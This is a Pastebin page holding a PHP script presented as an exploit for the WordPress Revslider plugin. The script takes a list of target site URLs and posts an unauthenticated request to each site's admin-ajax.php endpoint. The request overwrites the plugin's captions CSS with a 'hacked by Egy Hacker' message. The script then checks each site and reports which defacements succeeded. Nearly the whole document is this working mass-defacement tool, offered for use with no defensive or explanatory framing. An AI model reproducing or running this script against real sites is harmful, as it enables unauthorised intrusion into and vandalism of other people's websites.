Advertisement
Elmagico

Exploit Revslider - get_captions_css

Apr 19th, 2015
817
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.53 KB | None | 0 0
  1. <b>..::|| Wordpress Revslider Plugin Exploit ||::..</b>
  2. <?php
  3. /*
  4. [#]Coded By : ElMaGiCo
  5. [#]http://magico-sec.blogspot.com
  6. [#]http://www.facebook.com/ElKiller.2013
  7. */
  8. //======================================================
  9. @error_reporting(0);
  10. @set_time_limit(0);
  11. //======================================================
  12. echo'<form method="post">
  13. <textarea name="s" cols="50" rows="13" ></textarea><br>
  14. <input type="submit" name="g" value="GO" />
  15. </form>';
  16. //=======================================================
  17. if(isset($_POST['g']) and !empty($_POST['s'])){
  18.    
  19.     $urls = explode("\r\n",$_POST['s']);
  20.     foreach($urls as $url){
  21.     $url = trim($url);
  22.     $post = array("action" => "revslider_ajax_action",
  23.                   "client_action" => "update_captions_css",
  24.                   "data" => "<h2>hacked <br>by Egy Hacker <br>:)<br>");
  25.                  
  26.     $site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
  27.    
  28.     $ch = curl_init();
  29.     curl_setopt($ch,CURLOPT_URL, $site);
  30.     curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
  31.     curl_setopt($ch,CURLOPT_POST,true);
  32.     curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  33.     curl_setopt($ch,CURLOPT_TIMEOUT,30);
  34.     curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
  35.     $cn = curl_exec($ch);
  36.    
  37.                 $fcn = @file_get_contents($site);
  38.                 if(eregi('hacked',$fcn)){
  39.                     echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
  40.                     }else{
  41.                     echo"[!]$url : failed<br>";
  42.                     }  
  43. }
  44. }
  45. //========================= \!/ FiNiSH \!/ ====================================================//
  46. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement